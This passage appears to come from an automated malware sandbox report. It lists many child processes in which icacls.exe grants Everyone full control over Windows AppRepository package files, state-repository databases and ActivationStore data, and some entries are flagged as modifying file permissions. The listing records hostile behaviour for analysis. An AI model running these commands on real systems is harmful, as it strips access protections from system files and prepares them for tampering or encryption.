  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10832
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsSoundRecorder_2017.130.1208.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:13636
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsSoundRecorder_2017.130.1208.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11348
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:13164
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsStore_11701.1001.874.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:12628
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxApp_2017.113.1250.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10108
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxApp_2017.113.1250.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:14412
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11228
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-200_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11492
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:12332
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxGameCallableUI_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6296
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxGameOverlay_1.15.2003.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16628
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxGameOverlay_1.15.2003.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:14004
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxIdentityProvider_11.19.19003.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6260
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxIdentityProvider_2016.719.1035.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:12952
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10308
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:13152
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:12964
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-200_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11536
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11532
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneMusic_2019.16112.11621.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16760
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16744
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-200_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6000
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15260
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.ZuneVideo_2019.16112.11601.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:13648
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Deployment.srd /grant Everyone:F /T /C /Q
  2⤵
  PID:15436
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Deployment.srd-wal /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:13628
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Deployment.srd-shm /grant Everyone:F /T /C /Q
  2⤵
  PID:11740
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Machine.srd /grant Everyone:F /T /C /Q
  2⤵
  PID:8212
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Machine.srd-shm /grant Everyone:F /T /C /Q
  2⤵
  PID:11164
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\StateRepository-Machine.srd-wal /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:11716
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Windows.ContactSupport_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:9400
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16008
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Windows.MiracastView_6.3.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11120
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Windows.PrintDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:15416
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.PrintDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:11272
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.PrintDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:11268
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.PrintDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:13024
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.PrintDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-1985363256-3005190890-1182679451-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:16020
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.MiracastView_6.3.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:11204
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.MiracastView_6.3.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:15432
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.MiracastView_6.3.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:14064
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.MiracastView_6.3.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-1985363256-3005190890-1182679451-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:15756
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:16012
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:10596
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:12560
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-1985363256-3005190890-1182679451-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:12200
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.ContactSupport_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:14060
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.ContactSupport_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:11712
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.ContactSupport_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:10116
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Windows.ContactSupport_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-1985363256-3005190890-1182679451-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:12180
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:13776
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:13680
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:15468
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:16140
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:15772
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:6480
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:11540
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:12592
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:13836
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxIdentityProvider_11.19.19003.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:5176
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxIdentityProvider_11.19.19003.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:2328
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxIdentityProvider_11.19.19003.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:4992
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameOverlay_1.15.2003.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:3764
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameOverlay_1.15.2003.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:1148
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameOverlay_1.15.2003.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:10124
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameCallableUI_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:684
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameCallableUI_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:16164
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameCallableUI_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:6248
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:15064
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGameCallableUI_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-1985363256-3005190890-1182679451-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:15312
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:12008
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:5984
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:9008
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:5772
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:15384
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:12064
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:6312
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:16256
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:12740
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:6284
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:16260
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:13524
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:9608
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:13544
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:500
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:9472
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:9672
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:9624
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:6604
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:10164
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:10172
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:7572
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:9272
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:13416
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:7780
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:5588
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.WindowPicker_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:8136
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.WindowPicker_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:13928
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.WindowPicker_10.0.15063.0_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:9524
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.WindowPicker_10.0.15063.0_neutral__cw5n1h2txyewy\S-1-5-21-1985363256-3005190890-1182679451-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:14904
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ShellExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat /grant Everyone:F /T /C /Q
  2⤵
  PID:17008
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ShellExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 /grant Everyone:F /T /C /Q
  2⤵
  PID:17140
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ShellExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 /grant Everyone:F /T /C /Q
  2⤵
  PID:14864
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ShellExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy\S-1-5-21-1985363256-3005190890-1182679451-1000.pckgdep /grant Everyone:F /T /C /Q
  2⤵
  PID:7396
- C:\Windows\SYSTEM32\icacls.exe
